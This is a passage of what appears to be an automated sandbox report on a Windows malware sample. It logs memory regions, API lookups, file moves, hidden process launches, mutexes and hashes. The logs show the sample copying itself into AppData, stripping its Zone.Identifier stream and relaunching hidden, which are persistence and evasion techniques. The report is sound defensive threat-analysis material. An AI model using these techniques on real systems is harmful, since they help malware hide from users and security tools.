| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 |
Process #5: 119901.exe
53
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\public\119901.exe |
| Command Line | "C:\Users\Public\119901.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:05, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbf4 |
| Parent PID | 0xbe0 (c:\users\public\119901.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BF8
0x
BFC
0x
70C
0x
80C
0x
81C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001d2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001edfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00290fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002bcfff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| windowsshell.manifest | 0x002b0000 | 0x002b0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| 119901.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| locale.nls | 0x00430000 | 0x00496fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x0051ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x00521fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x006c7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x00850fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000860000 | 0x00860000 | 0x01c5ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001c60000 | 0x01c60000 | 0x01d5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d60000 | 0x01d60000 | 0x01d60fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001d70000 | 0x01d70000 | 0x01daffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001db0000 | 0x01db0000 | 0x021a2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x021b0000 | 0x0247efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002480000 | 0x02480000 | 0x024bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024c0000 | 0x024c0000 | 0x025bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025c0000 | 0x025c0000 | 0x025fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002600000 | 0x02600000 | 0x026fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002700000 | 0x02700000 | 0x0277ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002700000 | 0x02700000 | 0x0273ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0277ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002780000 | 0x02780000 | 0x0285efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002860000 | 0x02860000 | 0x0295ffff | Private Memory | Readable, Writable |
|
|
|
- |
| cversions.1.db | 0x02960000 | 0x02963fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x02960000 | 0x02963fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02970000 | 0x0298ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002990000 | 0x02990000 | 0x02990fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x02aa0fff | Private Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x029a0000 | 0x029cffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x029d0000 | 0x029d3fff | Memory Mapped File | Readable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x029e0000 | 0x02a45fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002a50000 | 0x02a50000 | 0x02b50fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002a50000 | 0x02a50000 | 0x02a50fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| rsaenh.dll | 0x02a50000 | 0x02a8bfff | Memory Mapped File | Readable |
|
|
|
- |
| comctl32.dll | 0x73e60000 | 0x73ffdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74380000 | 0x74395fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x744c0000 | 0x7453ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x74680000 | 0x746a0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x746b0000 | 0x747a4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wtsapi32.dll | 0x747b0000 | 0x747bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x747c0000 | 0x747cafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x747d0000 | 0x747e6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x75700000 | 0x75744fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x767a0000 | 0x76822fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x76a20000 | 0x76aaefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x76b40000 | 0x76c34fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076cd0000 | 0x76cd0000 | 0x76deefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000076df0000 | 0x76df0000 | 0x76ee9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x770d0000 | 0x7724ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe | 113.50 KB |
MD5:
e1e61c3cc78ea166684120028b97fc02
SHA1: b088f6483da0b4ebc5b7dd66355c97c91bc1e338 SHA256: 053489532b58188bf6ce8476040c70fcff7c69814b4dc98e1801e1d893160d9c |
|
|
Host Behavior
File (12)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Public\119901.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Users\Public\119901.exe | type = size |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\ | type = file_attributes |
|
1 | |
| Move | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe | source_filename = C:\Users\Public\119901.exe |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\OverloadGabriola.exe | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe:Zone.Identifier | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe | os_pid = 0x82c, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE |
|
1 |
Module (30)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x75570000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x74cb0000 |
|
2 | |
| Get Handle | c:\windows\syswow64\user32.dll | base_address = 0x75570000 |
|
1 | |
| Get Filename | c:\windows\syswow64\user32.dll | process_name = c:\users\public\119901.exe, file_name_orig = C:\Windows\syswow64\USER32.dll, size = 264 |
|
1 | |
| Get Filename | - | process_name = c:\users\public\119901.exe, file_name_orig = C:\Users\Public\119901.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fac8 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x18fb50 |
|
2 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x18fb50 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x770fe026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x74d66aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74cc5a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74cc11c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74cc14e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74cc14c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74cc1809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WTSGetActiveConsoleSessionId, address_out = 0x74d43f49 |
|
1 | |
| Create Mapping | C:\Users\Public\119901.exe | filename = C:\Users\Public\119901.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\Public\119901.exe | process_name = c:\users\public\119901.exe, desired_access = FILE_MAP_READ |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (4)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Time | type = Ticks, time = 172880 |
|
1 | |
| Get Time | type = Ticks, time = 173894 |
|
1 | |
| Get Time | type = Ticks, time = 174892 |
|
1 |
Mutex (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\I705BA84C |
|
1 | |
| Create | mutex_name = Global\M705BA84C |
|
1 | |
| Release | mutex_name = Global\I705BA84C |
|
1 |
Process #6: narrowexisting.exe
28
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\narrowexisting.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\NarrowExisting.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:02:12, Reason: Child Process |
| Unmonitor | End Time: 00:03:32, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x82c |
| Parent PID | 0xbf4 (c:\users\public\119901.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
83C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00216fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0031ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x00321fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x00342fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0035dfff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036dfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| 119901.exe | 0x00400000 | 0x00420fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000004b0000 | 0x004b0000 | 0x005affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x00737fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x0075ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x01ceffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001cf0000 | 0x01cf0000 | 0x020e2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x020f0000 | 0x023befff | Memory Mapped File | Readable |
|
|
|
- |
| rasman.dll | 0x743a0000 | 0x743b4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasapi32.dll | 0x743c0000 | 0x74411fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pdh.dll | 0x74420000 | 0x7445bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74550000 | 0x74557fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74560000 | 0x745bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x745c0000 | 0x745fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74610000 | 0x7461efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x74620000 | 0x74638fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x74640000 | 0x74648fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x74650000 | 0x74660fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| secur32.dll | 0x747f0000 | 0x747f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x74800000 | 0x74a3ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x74c20000 | 0x74c2bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x74c30000 | 0x74c8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x74c90000 | 0x74ca1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74cb0000 | 0x74dbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74dc0000 | 0x74eaffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74ee0000 | 0x74ffcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x75000000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x750d0000 | 0x7516ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x75170000 | 0x751c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x751d0000 | 0x75204fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x75290000 | 0x7542cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x75430000 | 0x75565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x75570000 | 0x7566ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75670000 | 0x756fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75750000 | 0x757affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x757b0000 | 0x757bbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757c0000 | 0x7585cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x75860000 | 0x75886fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x758a0000 | 0x764e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x764f0000 | 0x7659bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x765a0000 | 0x7679afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76830000 | 0x76839fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76840000 | 0x76885fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76890000 | 0x76895fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x768a0000 | 0x768b8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x768c0000 | 0x76a1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
